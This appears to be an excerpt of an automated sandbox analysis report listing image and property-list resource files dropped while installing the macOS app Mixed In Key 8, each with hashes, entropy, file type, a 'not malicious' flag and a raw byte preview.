SHA-512:	9963A9DDDD9C21C2A0C629102467E431D8708A418F93AEEA6F06F4D022740EF5E0060622656A999261A014170623CB65936631BAF4FA2050144F035B8150780E
Malicious:	false
Preview:	MM....R.............>...................................T....2016:08:11 00:18:09..?.@.$....BaP.d6...DbQ8.V-..FcQ..v=..HdR9$.M'.JeR.d.]/.LfS9..m7.Ng@...w?.PhT:%..G.RiT.e6.O.TjU:..{U.VkU..v._.XlV;%..g.A.. ...o.K.n..\|.......<..07h%.z....\T.{.c`.......j.....~...9..G......[T'C..@..P......v..~3'..b.\|.+A...z\...g2...'....o{-......:....G..v5w...y...0.;..[..o.....t..S..2..2.S...........O.E..Os:.9....C..........s\|.6/4E.<p..71{....2.`:.....!....#!.\|.%...u..s..0.B...N$x.R....0...Nd..8.....S$3..pd^.Ds..1@p.A-M.t..M.4...$]+O/#.......Gn\5.....S...K.t.%D...7G.e4.J...G.k...n.....2..6.q.......{9..+.4....d1...b.q5{,.O..5....W-..GUYmmih...2.... .m.Phe...}.w.g.B.....M.......Y..v.1q.B.R6m..O..!z.05..U3.0.`L$..5.Ee<:-..1.69.b7..7./<uO72...V.N%.<....`u.1.Y1M.m8o.v.........h..4.fr<..x........tn.xP.MD........~.....!.q..c........I/.....;...a!....my...ER.)B.\|.V..v5..X.....$.he....,...g....r...V=u.....C...e..W..V.oo...<C..~/)%M.....Z...{~.5*`..e+..]...\|.^......

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/.BC.T_6Sj8xf Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	PNG image data, 190 x 50, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	66119
Entropy (8bit):	3.966983863790688
Encrypted:	false
SSDEEP:	768:s359iQz/7N/idwnPWgZ/YEP3EnDx15QsPFzb4NIm5uUDzV2GKZaZnRp:q5z/MSnPYE/En5QVimU+2ranp
MD5:	62B8EE77BAA47C623AE75E5F7D2170C5
SHA1:	6D676CCB8F0D2918322D07792C6A1F556421C671
SHA-256:	6630F1A192A248444B3E2561FE6E6CA36E461FC1E36A9800D62520080DC9AA73
SHA-512:	0BE01FB0DDDA1123F5E7AC440F5452D2301AADE20D2683532760C8354399F519057B10008CF2848725C9A04D1A36DE247F871C1945150B8F95EFD5636ED73E03
Malicious:	false
Preview:	.PNG........IHDR.......2.......a>....pHYs...%...%.IR$....OiCCPPhotoshop ICC profile..x.SgTS..=...BK...KoR.. RB....&!..J.!...Q..EE..........Q,......!.........{.k.......>........H3Q5...B..........@..$p....d!s.#...~<<+".....x.....M..0.....B.\.....t.8K....@z.B..@F....&S....`.cb..P-.`'........{..[.!..... .e.D.h;...V.E.X0..fK.9..-.0IWfH.............0Q..)..{.`.##x.....F.W<.+.....x..<.$9E.[.-q.WW..(.I.+.6a.a.@..y..2.4..............x.....6..._-..."bb....p@...t~..,/...;..m..%..h^..u..f..@.....W.p.~<<E.........J.B[a.W}.g._.W.l.~<.....$.2].G......L.....b..G.......".Ib.X..Q.q.D...2.".B.).%..d..,..>.5..j>.{.-.]c..K'.Xt......o..(...h...w..?.G.%..fI.q..^D$.T.?....D...A....,.........`6.B$..B.B.d..r`)..B(...*`/.@.4.Qh..p...U..=p..a...(....A...a!..b.X#......!.H...$ ..Q"K.5H1R.T UH..=r.9.\F..;..2....G1...Q=...C..7..F...dt1......r..=.6...h..>C.0....3.l0...B.8,..c."......V.....c.w...E..6.wB a.AHXLXN.H. .$4...7...Q.'"..K.&.....b21.XH,#..../.{.C.7$..C2'...I..T...F.nR#.,..4H.#...dk..9.,

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/.BC.T_6et2cW Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	PNG image data, 522 x 266, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	13253
Entropy (8bit):	7.920478173918639
Encrypted:	false
SSDEEP:	384:bQ9zeaFyeZRJOAGjjf7XieO+MQHIrStKX/AMKWvbZu:bQVOSPqf7Xy8HIGtr
MD5:	35359050B19B48F8BE2E292C2A37A449
SHA1:	B757272931E76F039A4809D9DCEA3F549AC99A8E
SHA-256:	8A7BF4643E1E49F7E53FB6F3ACCE5B693B4F265391EE703579CE61323CC38C90
SHA-512:	92B044DF93E94F5C6708CDB1DB2D47C4C5C7A8D335BEC6A6179D9F0A6FCC8CFF80C9742038DC2A35B15325D42AAA1FF337D1F54605048C2FCE11BB4696238204
Malicious:	false
Preview:	.PNG........IHDR..............K.....iCCPICC Profile..H.c`.>.XP.......WR........~................\|.p.o...A.e].Y..a..).......@.... {...\^R.b_..E....._.......;..f.....r..U.l.$....N..]@..t..L!..lBy).y.......\|...)....@5:... .. [..60...MLVHO.N..LJM-J..@.!...!.!.A.!.!.!.....%1..y.@2........._PY...Q.....T..d=..#.C..A..Q.e.8^...!.....O..`.B,\..a..0.. .........$...A.gd<..@...c(`.:....$....[p<......./$...,.(.J,L....T..sY;.........W.R+V..G.B.\g..;}M...IF........Z,..h..F......a..%..."..n....=7x..~...O._#.*.'(&8;.".9.7\|Z...Qk.7.l..../~_..I.....L=.v .@....Y........#.{...ME...(]\6.\|f..............F.&.f...V.6..../;.w.....gbo}_n....f.T&.L.;...k..O_?c..YE.c.x.5.'7.s...w.._.q..%.Ks....[...o..U.V.[.v.u...6.o..$....[.o]..g{.......w...p....u..>.}P......Y{..X.q..Z'9N>?u...3.gc.Y..?....k.u\N..pU..k.....q3...m.....^....&.y..xt..'%O}..?gx~....R^..y...ws.........s..\|....M...g.,.Y............._...............k.........:.....s.X..X;.f`.p``.V.L..p..P..?.4/.....?C!.l..

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/.BC.T_8hhWZK Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	PNG image data, 36 x 32, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	441
Entropy (8bit):	7.335516391981174
Encrypted:	false
SSDEEP:	6:6v/lhP1WnDsjlIEOMnuiZKbRuaygtOOM9CL7HjL2o9Rees/RktIp3igL/35EpA/7:6v/7bjlIMn2R1L86LTO1UtIrz35mA7
MD5:	5AE62011E18E6128AD7BBEB645AA8B7D
SHA1:	2AE91233D93E73601221CD8270B5512BD5F6F558
SHA-256:	EC4AC790718CB25D3D55193A2ACFA791D153639C815876057FE912FD865499CA
SHA-512:	8C5E7D926DA9AAFC7573152FEA992030852110A65558B4F56A66C47950ADF58A305766BAFD383CB2B738583757F38AA2B91321EB45FC4AA8F7C7F1D8B5F36996
Malicious:	false
Preview:	.PNG........IHDR...$... .....z......tEXtSoftware.Adobe ImageReadyq.e<...[IDATx..MJ.A..G'G......... z.!kA..........Q.9.......L.*..]...K...dQ..R.=.U.Ha..&.Y#....y-.:.\..%;...U.:.....-f.......]f..!)x.@....:^%s.k.97C.........mn..uS.s.C...]...4t.F...m...Cv~.....c...H...2.....6...L.);.5.....!..........U...f...A.x..{.L..g..[&.Y.e.K.>").B.Q..H..]...2....Ku...w...:....h.5t"./..<=C{.S=e....5CC.X.....2...2w..0...)J........IEND.B`.

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/.BC.T_AbdHaD Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	PNG image data, 40 x 76, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	4309
Entropy (8bit):	7.883168293204685
Encrypted:	false
SSDEEP:	96:9Zka8VKV5VBMGTZRa6gZkjLcN78JPF3AJCfqcb03t07TJnQI:9Zk9VKV5VBkKIN76A4l7vdT
MD5:	66663506FF52DA921ED0EB28001D850E
SHA1:	2374E3A7DA1066BE2940B3BB907DD1BC81C5C45D
SHA-256:	58A735B284502F6215EF20EE522CA94253EB46608A89BF6E5FB14D93B1A933BC
SHA-512:	B1B6FA35C18140ACA4C90FF7E7FEA390A8DE86B1B3777409B6187982BA9DD94EE6115A0E4C9A3FE75CD018CB815400C4C6DDB577211F8B1B07B77CD16E0E2F56
Malicious:	false
Preview:	.PNG........IHDR...(...L........!....iCCPICC Profile..H....TSY...{/..B..z........PB.1!...Q.. "...C..G..X.Ql..R..dPQ.....}..vv....\|........n.=....\c.x.....L~...=&6......Q..P`..<...@.j..W}.D..c2S....WI...,..P....V..g.8...3.@.h^+;.7.[Q....\9..\|r..f....0O... P.L~2....<=....`P6.9\..Qva.0.y(.=`...b......Ou..R3A\..L.......#.3W........C..J../lf>t...V......2...lO3.".c..3n..L..9..E..1.?.,'..1...a.....@q.D......s...a.qnJD..gq...X...0?.S.....='.}..!....+3%.o...q?.D/oq..)...........+......f..l.S....uB...8 .0.+31gf_....U\|NrJ&..=%.t..ejL.4...`........%H.0.....Q.Mr.s...h.....\|N;..G.8....fs3[.`..H.Y......&....'....?... .,.,..2..d.<...."........u..8.Z.9p.\.7A/........`.\|.S...!*D.. uH.2.,!{.....0(....!.$..MP.T..C..z...,t....A...h.z.}........l....p.../...p......j.8.._.o....~.O".!#..b..#.H...$!\|d-R..".H#.t#w.......ah.:.....DbX......rL........L`.c.X........`.....l)........a?.p8y.......V.....p..>.(n...+.....<.../....._......d.:...C.#p.....c...~.3..Q..Ct$....U...v.m

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/.BC.T_B138Qd Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Apple binary property list
Category:	dropped
Size (bytes):	3684
Entropy (8bit):	6.300788864070002
Encrypted:	false
SSDEEP:	48:7ezJ1Ws0h333k/IRjmYF0h9yjbEbv2JzGz8+w/6m7El1NouWO9t6zwwPM+9nQNIL:21WdkY6WbEb+a1/NouT9AwT+qIJzt
MD5:	C937A122639DDEB8C31A600525E7549F
SHA1:	BCF342C417F491F0EECBC97026DDCCE71987463E
SHA-256:	B2B001C66BC824D1A4717D45C4DE362E1729398E0105FADB0BEE82B4192A8E2E
SHA-512:	01BED1029D47BC67CBBAACFE610C0096CB7AAC939FB973188B6794191E5DA61970761C17FC296F0B43BC4110B17755BB905169857130EDC4D9C63B7B218976FF
Malicious:	false
Preview:	bplist00..............2.3X$versionX$objectsY$archiverT$top.......8.......#.$....2.7.?.n.z.{.............................................................$.%.`.......&.'.(.b.).,./U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys......(.%.6...6.5.7.).. ...!."[NSClassName...._.,_TtC10MixedInKey26RadioButtonsViewController..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObject..+...,.-ZNS.objects.....%.&./.0\NSMutableSet../.1.)UNSSet..+...3.6..4.5........8.9.:.....<.=.>XNSSource]NSDestinationWNSLabel............@.A.B.C.D.E.F.G.H.I.J...K.L.M.N.O.P.Q.R.S.T.U.V.W.X.Y.Z.[.\.].^._.`.a.b.].d.e.^.].g.^.h.Y.i._.^.k.l.m.`_.%NSStackViewVerticalClippingResistance[NSFrameSize_..NSStackViewDetachesHiddenViewsXNSvFlags_..NSStackViewHasEqualSpacing_..NSStackViewEdgeInsets.left_..NSNextResponder_..NSStackViewSecondary

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/.BC.T_BuK5cB Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Apple binary property list
Category:	dropped
Size (bytes):	45871
Entropy (8bit):	7.025618848131701
Encrypted:	false
SSDEEP:	768:eegr86uHeEYyTtJNWTF3mvdukWLKO6sLEj:Xg46ALUlWPWLj6UEj
MD5:	2223B108B19AB9E2D192ED6BE25AA0FC
SHA1:	A8544B69D36A9975EAA0ED859EC00B661A4C47D2
SHA-256:	B98B8BCB6B6A6FE964C603ECB61DE3892FD9BCEF210AFBDB7189CF6AF7A51723
SHA-512:	577492821A6F2B71AA007E4170434EFF1678F99553A59D947B3613131F8B75D9211AEA27AAF30906F9FEB1118BE90A634AC27AA12BAC0DBFF1DD1D6F903E8A3C
Malicious:	false
Preview:	bplist00.................X$versionX$objectsY$archiverT$top................#.$.*...2.}..................................................................... .!.&.+.1.M.N.O.P.X.Y.\.f.g.k.p.q.u.v.z.........................................................................................+.,./.0.;.<.@.A.E.H.L.Q._.`.c.d.n.o.p.t.w.{...............................................................".'.(.).-.2.?.C.D.G.J.K.P.V.W.\.z.{.\|.....................................................................".'.(.)...4.9.F.G.K.L.P.Q.T.[.\._.`.e.n.x.........................................................................!.".%.G.r.s.t.u.v.w.x.y.z.{.\|.}.~.................................................................................................#.$.+.,./.2.3.F.K.Q.W.\.a.f.k.p.v.{...................................................................'.(.0.1.4.?.@.K.N.O.R.^._.c.h.q.r.u...................................................................3.8.=.B.H.M.R.X.^.c.i.n.s.x.}.............................

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/.BC.T_EBsBWc Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Apple binary property list
Category:	dropped
Size (bytes):	13575
Entropy (8bit):	6.755090526530679
Encrypted:	false
SSDEEP:	384:gUgNoQE03eEYNg7u2OC/mSufgrmUbwnmH3s2GTK:gUgK0eEYy7uQ6U0u
MD5:	FE9DBA29111114642329ACF215720D7D
SHA1:	E95D7D163F4FDF5D2B4F5548D6F9D29AE4500713
SHA-256:	7A3E426832F6D41013249D74BE058AC5E8D5976D82BA0B6132BDACCB8FC7ACAB
SHA-512:	21F17E3C19C70DB3B1ED6DFA110F8AA34AD84F47FF4F6CEEDAC02E7A8E275556EC3CD51B937A7D3836D53345D71966496B8E5BA570CCFF3E2CDCC54BED33C1AB
Malicious:	false
Preview:	bplist00.................X$versionX$objectsY$archiverT$top...............#.$.*...2.=.E.V.W.d.e.h.i.m.r.~............................................................. .(.1.2.>.?.@.I.J.O.P.U.Z.e.f.m.n.q.\|.}...............................................................#.)...3.8.=.C.J.K.Q.R.W.X.].^.c.d.h.u.v.w.x...Q.......................................4.X.............z.f.M...g.h.i.j.k.l.m.n.o.p.q.r.s.t.u.v.w.x.y.z.{.\|.}.~..............................U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys........................ ...!."[NSClassName...._.+_TtC10MixedInKey25FindReplaceViewController..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObject..+...,.-ZNS.objects.....%.&./.0\NSMutableSet../.1.)UNSSet..+...3.<..4.5.6.7.8.9.:.;.....n.p.r.u.~...K..>.?.@.....B.C.DXNSSource]NSDestinationWNSLabel.........

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/.BC.T_EkZtin Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	PNG image data, 44 x 44, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	1311
Entropy (8bit):	7.841926633046951
Encrypted:	false
SSDEEP:	24:L0+pKgHFPsECxN+RTdG/KbxD2cjo2e+zWgfXuz3ZQZv6b9LxR/e47TStq+:VKECxN4pG/K/e+zWgQQRO9LX2KTSQ+
MD5:	CAA146DCFBE758CC18AFB3600925697F
SHA1:	CFC5A002A0359814B0D96DFDE16478A3221140C7
SHA-256:	4639521D24D05DCFA67D8225D336285F0A822F968E7FDC779D32CFDEA8B22B5A
SHA-512:	009448ECDC4D7770A9EEB52A2B6B2B1E3776B4ABD58EEBA3AC46DA9D3C9A3602699805C7B03488B26A3F710E627C660050AA56AE2764A6D20F37E4AC2A95EF00
Malicious:	false
Preview:	.PNG........IHDR...,...,.......Z.....iCCPICC Profile..x..T.k.A..6n..".Zk..x."IY.hE.6..bk....E.d3I.n6..&.......E.....z.d/J.ZE(.(b..-..nL.....~..7.}ov...r.4......R..il\|Bj......A4%U..N$.A.s.{..z..[V.{.w.w.......@.G.....q.Y...<.).t......9Nyx...+=.Y"\|@5-..M.S.%.@.H8..qR>......inf....O.....b..N......~N..>.!....?F......?.a...=..5..`.....5.._.M'.Tq.....V.J.p.8.da.sZHO.Ln....}&....wVQ.y..g....E...0.......HP.E.a..P@.<.14.r?#....{2u$j.tbD.A{6.=.Q..<.("q.C....A...O.y..\..V........;........sM^\|..v.WG..yz....?.W.1.5..s...-_..)....U..K.uZ17.l.;=......s...7V..g.jH....U.O^...g..c.)1&v..!......K...`m.....).m..$.``.../]?[x.F...Q....T....d4...o..........(./l...mSq...e.ns.....}.nk.~8..X<...R5. ...v.z..)....9R.,.....bR.P.CRR.%.eK...Ub.v...n..9B..Je........R...R.~N....o...E.x......IDATX...KN.0..P.#.@.X.f.7...]r.8..#9.+V,...z.0.p.c...X....e2q....Z...a..%.......a..pl`..........dD.o...<M.3>H..^)u.`.{5)..v.....@.....;j....=......y.`.>.LS`.m......s.).-pJ?......s...1....

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/.BC.T_EzdL9I Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	TIFF image data, big-endian, direntries=24, height=44, bps=0, compression=LZW, PhotometricIntepretation=RGB, description=Pioneer_Icon@2x.png, orientation=upper-left, width=44
Category:	dropped
Size (bytes):	10518
Entropy (8bit):	7.041631894603587
Encrypted:	false
SSDEEP:	192:LhXGc5GTSt5koskYNMtKwZEfx+6ckudYNMtKwy:LhXG+GTStioskYNg7ZEZ+6vudYNg7y
MD5:	BE3A88D0538C9959CFE5651C0189AF71
SHA1:	C224B19DAC4C066EBDF938930DD7936B7D709F54
SHA-256:	8C0D1A65AFCE92DEFCF0CA6B9ABF1E4BABBB437D8CD2A2FA70CBC8FA13729AAC
SHA-512:	C3A3E5306D4D7E47071946C12E0F9F6CCE9B8657DB93A3FC2D091673054856F629C39B1A45EAFD4A6981D413A61A00135268FDD06A5C58DCEF8EF0A96BD521B7
Malicious:	false
Preview:	MM....h.............>.......................,...........,....2016:07:27 02:45:19..?.@.$...g5..d6...Da........X.v=...FB.\|....B...d83.4.O.P.E..HAU...E$.I.....:X..`..4.e.5A\..l.K..Jj.b<....V."b.x...Q.....Z.".)..r..........hU.%..y....c".p..mx.f......(....N...#.y....`..q.........'....g..AG6.(..g.x......!..*.h.#`.x+.........E.A0E.~GW..<P.D......Sl...<.[0...)6..,z.h@ ...7.(.....4....:Jh....(0..)...>/...,E..02p.{..`..p ...q'..P...J.s .B.i..J K...R..K\|. .B..RIR.<.".j.(2.....J1...h)D..Z.. .B..1((....i......2..Z....L...(n.!...m..).........J.=.s.@ ."ZT .r.;... . .B.p....R...l..Hh...h%.../.\...=N.4..P .M....!p...%,.:.a.. .,.H!.."6....(\..h..e53.!Q#.LD..(#../..c..B.B...F]......aT...0\...e....)"...`d..4..).]..+.......O .........!.~G1..H.ch.Qge.X.&......? d.0..P.ef.*.......g8V.?....K.~..!..,k.&p...^...&.... Y.!a.@...%`.L.6.x..Z:...... ............Cd.w.z....`......).....?x9..C..%x....... ........"._k..)...M.aL..:ZmBH)R..x.?. ..o..3..W3..+ .z.b.M..{...

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/.BC.T_FQqQ7J Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	PNG image data, 190 x 50, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	66119
Entropy (8bit):	3.5402911519969726
Encrypted:	false
SSDEEP:	1536:qi/rbkei/VHzkgOzjHXvVdMNuKLCLCTT4NfsmV30D4sit9xBRw7IGnVoW14b5J9+:T6u5+
MD5:	7859A67EBC07FDF778C521E41BE9EDB9
SHA1:	A18BB046C3FDB288605F8B2357300E40091FA3CE
SHA-256:	E8986B5809DBB2F57AD06BF740FEBA911BD0DA7F68C4AD6B298A318BFA50A78E
SHA-512:	D2E781FE9B31CCF51CF318F3F48FE51A24F60060B67E0F2C7A6171FCCE0214FE7C315F4AFB897D3F9C8B4F75C8ABD79C3C376E3C914C1A16C1E3B51C49D0203C
Malicious:	false
Preview:	.PNG........IHDR.......2.......a>....pHYs...%...%.IR$....OiCCPPhotoshop ICC profile..x.SgTS..=...BK...KoR.. RB....&!..J.!...Q..EE..........Q,......!.........{.k.......>........H3Q5...B..........@..$p....d!s.#...~<<+".....x.....M..0.....B.\.....t.8K....@z.B..@F....&S....`.cb..P-.`'........{..[.!..... .e.D.h;...V.E.X0..fK.9..-.0IWfH.............0Q..)..{.`.##x.....F.W<.+.....x..<.$9E.[.-q.WW..(.I.+.6a.a.@..y..2.4..............x.....6..._-..."bb....p@...t~..,/...;..m..%..h^..u..f..@.....W.p.~<<E.........J.B[a.W}.g._.W.l.~<.....$.2].G......L.....b..G.......".Ib.X..Q.q.D...2.".B.).%..d..,..>.5..j>.{.-.]c..K'.Xt......o..(...h...w..?.G.%..fI.q..^D$.T.?....D...A....,.........`6.B$..B.B.d..r`)..B(...*`/.@.4.Qh..p...U..=p..a...(....A...a!..b.X#......!.H...$ ..Q"K.5H1R.T UH..=r.9.\F..;..2....G1...Q=...C..7..F...dt1......r..=.6...h..>C.0....3.l0...B.8,..c."......V.....c.w...E..6.wB a.AHXLXN.H. .$4...7...Q.'"..K.&.....b21.XH,#..../.{.C.7$..C2'...I..T...F.nR#.,..4H.#...dk..9.,

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/.BC.T_GNvCOc Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	PNG image data, 26 x 28, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	859
Entropy (8bit):	5.955378503717219
Encrypted:	false
SSDEEP:	24:O/65YWuqylxbDv/yKwZMQDJYMcStcZaI3eoEL:O/6zUvqhZMRkom
MD5:	24F24522DBDD5E42203717CCDD010AA6
SHA1:	13ABB1B088A7D44D52F2FD5C583931CFFBF9BC4C
SHA-256:	73970EC5284D412D9DFCAD026F49C77281B7C7E1BBE8FA5CAD926C21F3AB8143
SHA-512:	8C1F7E559EDA4E374E0BF2CB540F0646F073543D1BBDB7AD110B9F88266DACDBF265E9B53782EE3840ECB79E546F27CA5F5922A73137C0E6D166B9EDF070A2B6
Malicious:	false
Preview:	.PNG........IHDR.....................gAMA......a.....pHYs................riTXtXML:com.adobe.xmp.....<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="XMP Core 5.4.0">. <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">. <rdf:Description rdf:about="". xmlns:tiff="http://ns.adobe.com/tiff/1.0/". xmlns:xmp="http://ns.adobe.com/xap/1.0/">. <tiff:YResolution>72</tiff:YResolution>. <tiff:Compression>5</tiff:Compression>. <tiff:XResolution>72</tiff:XResolution>. <xmp:CreatorTool>Flying Meat Acorn 6.1.3</xmp:CreatorTool>. <xmp:ModifyDate>2018-07-06T14:32:15</xmp:ModifyDate>. </rdf:Description>. </rdf:RDF>.</x:xmpmeta>.:i.x....IDATH.cd.......=...0..t$.-rdHTd.c...Hj@L.... .z.-B3...Q.......:x..&.xP....:RC...{.%*:.U..$P]t...Tq.&..."$..b.ZDvH....A.8.Z..A..].......IEND.B`.

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/.BC.T_LEiWad Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	PNG image data, 56 x 56, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	2160
Entropy (8bit):	7.898414881972223
Encrypted:	false
SSDEEP:	48:9KECxN4pG/K/e+zWgzM4ik6BCucf03iJhDEjtKh/DM1z:Y7Nvi/hqgzpN6AuCMtKh/At
MD5:	781CB2090B079031C608C0EDFF628A26
SHA1:	9A4114A762607A9FA34F356EE0F7523B188C17A5
SHA-256:	F5E9605AEDCA0134AAD16B2FEB441D4E163C106855457AFBC7F2183B80B31831
SHA-512:	CA54CBA0D89AC2B9530D1698BDE4F616E763E0F73CF98CB82B799B73DE05D613547B52BE8920E048A7A1688CD8274DBFD98259AFBAB661EC86E39787ED090222
Malicious:	false
Preview:	.PNG........IHDR...8...8.......;.....iCCPICC Profile..x..T.k.A..6n..".Zk..x."IY.hE.6..bk....E.d3I.n6..&.......E.....z.d/J.ZE(.(b..-..nL.....~..7.}ov...r.4......R..il\|Bj......A4%U..N$.A.s.{..z..[V.{.w.w.......@.G.....q.Y...<.).t......9Nyx...+=.Y"\|@5-..M.S.%.@.H8..qR>......inf....O.....b..N......~N..>.!....?F......?.a...=..5..`.....5.._.M'.Tq.....V.J.p.8.da.sZHO.Ln....}&....wVQ.y..g....E...0.......HP.E.a..P@.<.14.r?#....{2u$j.tbD.A{6.=.Q..<.("q.C....A...O.y..\..V........;........sM^\|..v.WG..yz....?.W.1.5..s...-_..)....U..K.uZ17.l.;=......s...7V..g.jH....U.O^...g..c.)1&v..!......K...`m.....).m..$.``.../]?[x.F...Q....T....d4...o..........(./l...mSq...e.ns.....}.nk.~8..X<...R5. ...v.z..)....9R.,.....bR.P.CRR.%.eK...Ub.v...n..9B..Je........R...R.~N....o...E.x.....=IDATh..[[N.1.m.\|.Iw.....:. ...X.e...PV.].....bV.t..+h.y...=.83~Llai....~.3..~HY...........K...@....>L..._ZZ....S.s,... A===.B....G.O..q....R.].....g.X.(.JOnooYw..nnn..I...d5^H".G777.X."V.Q.

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/.BC.T_LwVHyQ Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	PNG image data, 145 x 145, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.945521166023985
Encrypted:	false
SSDEEP:	192:cRV/zG+HAn0bGM54d0ajOhCMCWJyRg94+55w4ZlwyZHf4iX:OV/iKy/d1jyJyRZ+55w4BHz
MD5:	BB8833461FB7746AB0D8EB8DD9192309
SHA1:	F8233324839BEBA999B07E2C00F21E76FFC8026C
SHA-256:	B3425993FF07645E7C1BFF16BADEFEB2E248FD24BA08C7A879B2246D30656251
SHA-512:	1E430F86F61A86927032B9AB2A29CBA58F1AFFA02E88089B9FBAD7C4DBE485F9652F88CD65ACC267A83E0C7FD56D07EE965F50E734B71C3235F4730ED3B1ACF0
Malicious:	false
Preview:	.PNG........IHDR...............Z#....iCCPICC Profile..H....TS....7.......{o...P..`#$.B.!....#8.TD.....".".X....N.AD...6..<..{..ur............g...2.9\|.0:....L.?......X..".oTT8@5=.].o..nZO......T8\...(..T......t...B1.H.j7...&x..jB.@.['8}.{&8u...>...(...@f.....'r....h.2.e;>..Gy"..;..Ay#.V99.&..e...I.[.TyL.+].S{..!.'.d.......-..a..r.0$..5&.-kQ.....#.......IH.4.E....a....f....4^.S.G..f.hy\|.(0f.Y..$Yq..\.<faFl.4...gO.(+&.....D.kN.....#..xL..8#6D.G....Dy..n@.......~....(.?7;Xn.........(..d.B.....`@.q .....@...>......./.,...3.t_..q.L>...`g..`.>N..oi....].n[]...I.Lv.-.:.GS. 5}....@y..K.l.0o......P.j@.........x....BA$..I`.`....V..........`+....^p....@.h...Ep.\......!.....`.. <D...&...C......@(......(..C.h)....h.T...NB..P.t...F.7.g.........0.....Xx>....p1....k.Cp3\|.....R..<..D..!..5.@..H$.IC..r...@j.....Fn"R.%....P1t.5......1...u..AL3..s.3...\|.R..XK.;..M.c.%...~l.....;.}...h8S.+......-.....5.:p}.A......[.=.x.^./.o........?...z..B.!..'."T...g.7..q.2

